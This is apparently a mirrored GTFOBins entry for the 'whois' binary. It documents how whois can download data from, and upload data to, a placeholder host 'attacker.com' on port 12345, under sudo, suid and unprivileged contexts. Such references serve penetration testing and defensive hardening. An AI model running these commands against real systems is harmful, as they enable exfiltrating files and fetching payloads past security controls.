1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/whois
2026-01-15 20:28:55 +01:00

25 lines
489 B
Plaintext

---
functions:
download:
- code: |-
whois -h attacker.com -p 12345 x
comment: |-
Received data has instances of the `\r` byte stripped.
contexts:
sudo:
suid:
unprivileged:
sender: tcp-server
upload:
- binary: false
code: |-
whois -h attacker.com -p 12345 DATA
comment: |-
Data is converted to lower case, and has a trailing `\r\n`.
contexts:
sudo:
suid:
unprivileged:
receiver: tcp-server
...